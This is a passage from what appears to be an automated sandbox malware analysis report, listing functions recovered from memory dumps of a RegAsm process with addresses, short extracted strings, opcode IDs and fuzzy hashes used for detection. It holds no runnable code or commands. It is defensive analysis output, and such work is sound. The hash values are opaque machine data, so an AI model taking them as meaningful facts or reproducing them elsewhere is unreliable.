                                                                                                                                                                                  • Instruction ID: b54810d88d70f74bac83c23455a3a3dbc8365c1ddc1d61a7e41c200089b6afbd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e1b20ed77b7d95511f1a1bce61467f80cc174bbbcf5fe90e82ff296bd96d932
                                                                                                                                                                                  • Instruction Fuzzy Hash: 27E19130B106289FCB19FB65D8549AE77B7AFD9300B008618E806AB398DF349D06DB81
                                                                                                                                                                                  Function 05336D60 Relevance: .3, Instructions: 346COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e8270f9d970559718e85fc6470b0f80098a7cebdc6de83ed8f1d5b019dbcd9ea
                                                                                                                                                                                  • Instruction ID: 569a1e1bee3a10c2b3e6f75ecf88c0e8558cf3f22f851f6b3834dc06466c6dd5
                                                                                                                                                                                  • Opcode Fuzzy Hash: e8270f9d970559718e85fc6470b0f80098a7cebdc6de83ed8f1d5b019dbcd9ea
                                                                                                                                                                                  • Instruction Fuzzy Hash: 36D17C34B106289FCB19FF65D8548AE77B3EFD9300B508618E806AB398DF349D06DB80
                                                                                                                                                                                  Function 05324720 Relevance: 7.7, Strings: 6, Instructions: 226COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                                                                                                                                                                  • API String ID: 0-723292480
                                                                                                                                                                                  • Opcode ID: 1b4736daa0851e598ebae81417eff1c308e5594e536b9bdc576155a3eaf52902
                                                                                                                                                                                  • Instruction ID: 0c96a323922e7915fbb00ff5f309290b800c8efe446598d3f9ae85d3deef4358
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b4736daa0851e598ebae81417eff1c308e5594e536b9bdc576155a3eaf52902
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9581E770A402089FC719EF69D991AAEB7F7FFD8300F504968D44A9B398DE74AD05CB90
                                                                                                                                                                                  Function 05547C60 Relevance: 6.6, Strings: 2, Instructions: 4052COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4143513000.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5540000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4'^q$4'^q
                                                                                                                                                                                  • API String ID: 0-2697143702
                                                                                                                                                                                  • Opcode ID: 935588413e3e8a49302579e49964acd9f94df3dad230589ef32a66fc3b2aa448
                                                                                                                                                                                  • Instruction ID: 0c731e067ca9eb22c80f3d053d4cff72e6b72f56206a4df2d0ae9af4423d5204
                                                                                                                                                                                  • Opcode Fuzzy Hash: 935588413e3e8a49302579e49964acd9f94df3dad230589ef32a66fc3b2aa448
                                                                                                                                                                                  • Instruction Fuzzy Hash: A163E3B0F512248FCF646B68991827FB9E7BFC8658F54855AD90BD7388EE308C418F91
                                                                                                                                                                                  Function 01013EA0 Relevance: 3.9, Strings: 3, Instructions: 159COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 6=/[$Vy27$dv-z
                                                                                                                                                                                  • API String ID: 0-1629571137
                                                                                                                                                                                  • Opcode ID: 5337e5ef3e1f85e0b2ff808a640630bea7a197a5f8bb09b83a79455756f5860e
                                                                                                                                                                                  • Instruction ID: b5397f34c3d6b1ac25b8ebcfcd258aa03b5f3aaee76844a0821202cc62afaad6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5337e5ef3e1f85e0b2ff808a640630bea7a197a5f8bb09b83a79455756f5860e
                                                                                                                                                                                  • Instruction Fuzzy Hash: BF9156B0806B848FD349DF1A8588BA1BBE0BF89314F5A86FAC05C8F272E7758445CF51
                                                                                                                                                                                  Function 01011E30 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $`@$Te^q$Te^q
                                                                                                                                                                                  • API String ID: 0-4248201741
                                                                                                                                                                                  • Opcode ID: f1517a150f85bfda0f7fce844d84ed9044971490a3735d33c8b6e11ad0732797
                                                                                                                                                                                  • Instruction ID: b6e6c5d399740cc34e85de62a2f6ced52f918d708671d31018e78a9fa5866d82
                                                                                                                                                                                  • Opcode Fuzzy Hash: f1517a150f85bfda0f7fce844d84ed9044971490a3735d33c8b6e11ad0732797
                                                                                                                                                                                  • Instruction Fuzzy Hash: A4513A74A01104CFD748DFB9D598AADBBF3BF88300F2585A9E5859B3A9CB789C41CB41
                                                                                                                                                                                  Function 0554B7B0 Relevance: 2.8, Strings: 2, Instructions: 314COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4143513000.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5540000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4'^q$4'^q
                                                                                                                                                                                  • API String ID: 0-2697143702
                                                                                                                                                                                  • Opcode ID: 002561d6b53557e52ca9bc88403f285eb2518c1c086190f8d5dbcd09573521ce
                                                                                                                                                                                  • Instruction ID: f16577b6c547e9108f73895ba4fc565fba8094a9fbb0127679dd98be78df7510
                                                                                                                                                                                  • Opcode Fuzzy Hash: 002561d6b53557e52ca9bc88403f285eb2518c1c086190f8d5dbcd09573521ce
                                                                                                                                                                                  • Instruction Fuzzy Hash: 57B1B574B503018F8F15AB25A55957EBBA7FFC42287948429E807C7388DF34ED068F82
                                                                                                                                                                                  Function 05324710 Relevance: 2.6, Strings: 2, Instructions: 123COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4'^q$pbq
                                                                                                                                                                                  • API String ID: 0-3872760177
                                                                                                                                                                                  • Opcode ID: 3979f57f897177e610d0e092bc1732abcc8064da8560c8dc447cca769f6acfd4
                                                                                                                                                                                  • Instruction ID: 10e4339b429ca400e4b7bea573119815ecc0919e7e68ebfe5230ac36e47c06e8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3979f57f897177e610d0e092bc1732abcc8064da8560c8dc447cca769f6acfd4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C41B2306402098FCB15EF69D985AAEB7B7FFD8300F408928D4469B398DF74AD46CB90
                                                                                                                                                                                  Function 0101DDCD Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Lsq$]q
                                                                                                                                                                                  • API String ID: 0-3260979199
                                                                                                                                                                                  • Opcode ID: 9d1f90350d9b3b99c40690123abbf052dc035ce197bcdc130c04f39f1a1d33ad
                                                                                                                                                                                  • Instruction ID: c3683ef5225745d56c499d17a6e451368675bbcdebed33c78fe113eea3425250
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d1f90350d9b3b99c40690123abbf052dc035ce197bcdc130c04f39f1a1d33ad
                                                                                                                                                                                  • Instruction Fuzzy Hash: 04313A2114D2948FC71B77A8A85D1B67FA5DB923217484997D5C58B2AFC6188C0BC3A3
                                                                                                                                                                                  Function 053284D0 Relevance: 2.0, Strings: 1, Instructions: 799COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ,bq
                                                                                                                                                                                  • API String ID: 0-2474004448
                                                                                                                                                                                  • Opcode ID: 9ae1de4435fcbc144c61cff46ccddde07ba9b4af63f07f643216188a7ad1ff4d
                                                                                                                                                                                  • Instruction ID: ed591091b59f080175762f0ce1feed121ed84bab0e22dc6cfbff1b1d4d0745ea
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ae1de4435fcbc144c61cff46ccddde07ba9b4af63f07f643216188a7ad1ff4d
                                                                                                                                                                                  • Instruction Fuzzy Hash: ED820A74A102289FDB65DF69D884B9EB7B2FF88300F5081E9E509A7354DB70AE85CF50
                                                                                                                                                                                  Function 010146A0 Relevance: 2.0, Strings: 1, Instructions: 776COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: a^q
                                                                                                                                                                                  • API String ID: 0-3411664965
                                                                                                                                                                                  • Opcode ID: 0510495ac012dcdb9ad8b73a28d0ecd261fc86b2097ebc2bb938ae41483c8ae4
                                                                                                                                                                                  • Instruction ID: ecf26e4e6e1d4a6026b57d9ee24d08f2cf157b4b26e93a3407b30559ac738790
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0510495ac012dcdb9ad8b73a28d0ecd261fc86b2097ebc2bb938ae41483c8ae4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C62AF307202248BC759EF69E85969E7BB2EFC4340F5085A9E9069B3C9CF749D46CF90
                                                                                                                                                                                  Function 010148DF Relevance: 1.9, Strings: 1, Instructions: 607COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: a^q
                                                                                                                                                                                  • API String ID: 0-3411664965
                                                                                                                                                                                  • Opcode ID: 9ad16ff75d3aa2ffd9562a3b544f511bae2ebc8bc09ea1c29d783bbfd4db8e8a
                                                                                                                                                                                  • Instruction ID: d3a775c1bdde76f32caa4d4816e16ddd24a0d266cb908fa5bb0495888665f791
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ad16ff75d3aa2ffd9562a3b544f511bae2ebc8bc09ea1c29d783bbfd4db8e8a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2032D1307202248BD759EF69E8596AE7AB2EFD4340F508599E9079B3C9CF749D02CBD0
                                                                                                                                                                                  Function 01014956 Relevance: 1.8, Strings: 1, Instructions: 583COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: a^q
                                                                                                                                                                                  • API String ID: 0-3411664965
                                                                                                                                                                                  • Opcode ID: 692cfb0fab833cc61ef1c86a708ed816b2a985e9a38a1487e6e0a2acc0fc1727
                                                                                                                                                                                  • Instruction ID: a68d3b060d105c46045445d40a5f285556a57bf9afe4f0a2b44b58129856e0dd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 692cfb0fab833cc61ef1c86a708ed816b2a985e9a38a1487e6e0a2acc0fc1727
                                                                                                                                                                                  • Instruction Fuzzy Hash: CB32C1317202248BD719EF69E85969E7AB2EFD4340F508599E9079B3C9CF749D02CBD0
                                                                                                                                                                                  Function 0101498A Relevance: 1.8, Strings: 1, Instructions: 572COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: a^q
                                                                                                                                                                                  • API String ID: 0-3411664965
                                                                                                                                                                                  • Opcode ID: 00e766a1f559f44e7ab7b4417af0449ab3e3e32ccdd1474568771a88d7decffb
                                                                                                                                                                                  • Instruction ID: c5acac75853255a94f38d1bbf6b48e08783ad21e99832942f9e7ac97ddcec87c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 00e766a1f559f44e7ab7b4417af0449ab3e3e32ccdd1474568771a88d7decffb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C32C0317202248BD719EF69E85969E7AB2EFD4340F5085A9E9079B3C9CF749D02CB90
                                                                                                                                                                                  Function 010149E8 Relevance: 1.8, Strings: 1, Instructions: 551COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: a^q
                                                                                                                                                                                  • API String ID: 0-3411664965
                                                                                                                                                                                  • Opcode ID: 6839a3fefebea032f8a7b834407df3b97c8702a436bfa5e287f6947efe6adb3b
                                                                                                                                                                                  • Instruction ID: fca4e2150e1b8003f84ce2608f637523c020b6f48388d9aac615be43ef609710
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6839a3fefebea032f8a7b834407df3b97c8702a436bfa5e287f6947efe6adb3b
                                                                                                                                                                                  • Instruction Fuzzy Hash: E622D1317202248BC719EF69E85969E77B2EFD8340F5085A9E9079B3C9CF749D02CB90
                                                                                                                                                                                  Function 053284C0 Relevance: 1.6, Strings: 1, Instructions: 341COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ,bq
                                                                                                                                                                                  • API String ID: 0-2474004448
                                                                                                                                                                                  • Opcode ID: c2efaecc8e0e5344f7afaad78113b2547791dadc86e721c058060e5e95753a8b
                                                                                                                                                                                  • Instruction ID: 748573808531b544702ce3bc0de75711f0f83bfc3717eae2acf67d4c9a62e12d
                                                                                                                                                                                  • Opcode Fuzzy Hash: c2efaecc8e0e5344f7afaad78113b2547791dadc86e721c058060e5e95753a8b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FE15D74A102289FCB15DF69D854BDEBBB6FF88300F108199E509A7394DE70AE85CF80
                                                                                                                                                                                  Function 01015700 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Deq
                                                                                                                                                                                  • API String ID: 0-948982800
                                                                                                                                                                                  • Opcode ID: 1cf5c903c03dfb1fde5423b79057b3597051b0568002e36f27d13e240640bc1e
                                                                                                                                                                                  • Instruction ID: 42da3d7c692b74d67986377ea81b6d7213207583d993e8578c58379990d174f9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1cf5c903c03dfb1fde5423b79057b3597051b0568002e36f27d13e240640bc1e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 71A1B331A006109FC714EF29D884A9DBBF2FF8A310F1585A9E445EB3A5DB74EC41CB91
                                                                                                                                                                                  Function 0101BF20 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: (bq
                                                                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                                                                  • Opcode ID: 1e8990644832c53958205371e74dd09052f6dfa0b26018e3c1b3ec1113aeb5c7
                                                                                                                                                                                  • Instruction ID: 424c8f4ac799816406dce09b89ceefdc6266a94f3d8893a10253555f101509c1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e8990644832c53958205371e74dd09052f6dfa0b26018e3c1b3ec1113aeb5c7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B51E331A006069FC701DF58C480AAAFBB5FF89324F1581A5F959A7242D739FC51CBD0
                                                                                                                                                                                  Function 010156EF Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Deq
                                                                                                                                                                                  • API String ID: 0-948982800
                                                                                                                                                                                  • Opcode ID: ec913088b081f25ccf4d7778cfa75e276c573eb20124552a39e28057a32ed515
                                                                                                                                                                                  • Instruction ID: 775b68c4241fa7acbc6e71d9942748bc0bdaed8fc734a6e9e5c93b659c7c2fb6
                                                                                                                                                                                  • Opcode Fuzzy Hash: ec913088b081f25ccf4d7778cfa75e276c573eb20124552a39e28057a32ed515
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3961A2356006118FC714EF29D884A99FBF2FF89310B1582A9E846EB3A5DB34EC41CF90
                                                                                                                                                                                  Function 01019E40 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: pbq
                                                                                                                                                                                  • API String ID: 0-3896149868
                                                                                                                                                                                  • Opcode ID: 2962b156016541417c121bc6ff17670e17892cccbace3ffa53aebdcddf4d6d07
                                                                                                                                                                                  • Instruction ID: b405b12efcb4d29bf5e504602e118f42fda6f8c50c7c8d4e07489c6eef910cc2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2962b156016541417c121bc6ff17670e17892cccbace3ffa53aebdcddf4d6d07
                                                                                                                                                                                  • Instruction Fuzzy Hash: E3515D36610100AFCB49EF99DC48E5A7BA7FF8C3507158094E6069B3BACA36DD12EF50
                                                                                                                                                                                  Function 01019E50 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: pbq
                                                                                                                                                                                  • API String ID: 0-3896149868
                                                                                                                                                                                  • Opcode ID: cc71e96c7d43e3bfee859e4de9752d4423d31f26e0f99dd6395b71882560e409
                                                                                                                                                                                  • Instruction ID: 9a80c5aa2d1fb1b9b4e69e30d06be2d9a12f3ead5c9929b17f360a59be3b865c
                                                                                                                                                                                  • Opcode Fuzzy Hash: cc71e96c7d43e3bfee859e4de9752d4423d31f26e0f99dd6395b71882560e409
                                                                                                                                                                                  • Instruction Fuzzy Hash: C1515F35610100AFCB49EF99DC54E5A7BA7FF8C3507158094E6068B3B6CA36DD12DF90
                                                                                                                                                                                  Function 053244D0 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4'^q
                                                                                                                                                                                  • API String ID: 0-1614139903
                                                                                                                                                                                  • Opcode ID: 45e64db4bfef310d0b4d3f15c5fd96f395d9c91673e6c2d2b5f4dded19bc0eb3
                                                                                                                                                                                  • Instruction ID: 4beab564887c16f5e331c3b76fb5c3b06a67e077f222393404f7f1c8bc70fa7d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 45e64db4bfef310d0b4d3f15c5fd96f395d9c91673e6c2d2b5f4dded19bc0eb3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1841C235710114EFCB09EF99EC45AAE7BF7EF9C310B408168E60697395CE359D029B90
                                                                                                                                                                                  Function 053244E0 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4'^q
                                                                                                                                                                                  • API String ID: 0-1614139903
                                                                                                                                                                                  • Opcode ID: 652e9ffa62b64eb07f6eaeb528df7d3da6df61262b14d515a4b0aac0a8a9daa0
                                                                                                                                                                                  • Instruction ID: 5bea56d9e96fd63942400c0432d0d211607cb29ac1217986f43487f7679b9c6d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 652e9ffa62b64eb07f6eaeb528df7d3da6df61262b14d515a4b0aac0a8a9daa0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3941C230710114DFCB59EFA9E844AAE7BF7EF9C310B008068E60697398CE358D029FA0
                                                                                                                                                                                  Function 05547BF4 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4143513000.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5540000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4'^q
                                                                                                                                                                                  • API String ID: 0-1614139903
                                                                                                                                                                                  • Opcode ID: 112f52c1df9df2006fa70ba7d8e463cfd3569a84c8d1f214c98639caf6d6a760
                                                                                                                                                                                  • Instruction ID: 4c68dae9fc986f2b0f1ff96bf036d7799204ff03db6c422cc65a4245cfb778d2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 112f52c1df9df2006fa70ba7d8e463cfd3569a84c8d1f214c98639caf6d6a760
                                                                                                                                                                                  • Instruction Fuzzy Hash: CC315971E193508FCF164A20AC047EABB76FF45315F0804AAE805DB281C7748C46CB91
                                                                                                                                                                                  Function 02CB6A09 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: p<^q
                                                                                                                                                                                  • API String ID: 0-1680888324
                                                                                                                                                                                  • Opcode ID: a6720bcf07ca67adbd7b93cc0a9cbe873c8e1594e70ef40a483fe0de9e20ed36
                                                                                                                                                                                  • Instruction ID: 4eef7c8f4d0504effad8216262b770ca11f600b6e6a0adf69c93f21f75d0ccfc
                                                                                                                                                                                  • Opcode Fuzzy Hash: a6720bcf07ca67adbd7b93cc0a9cbe873c8e1594e70ef40a483fe0de9e20ed36
                                                                                                                                                                                  • Instruction Fuzzy Hash: A7318D716441949FCF56DF69C8A09EA3BABEFDA200F548191F849C7395CB34CD52DB20
                                                                                                                                                                                  Function 02CB6A18 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
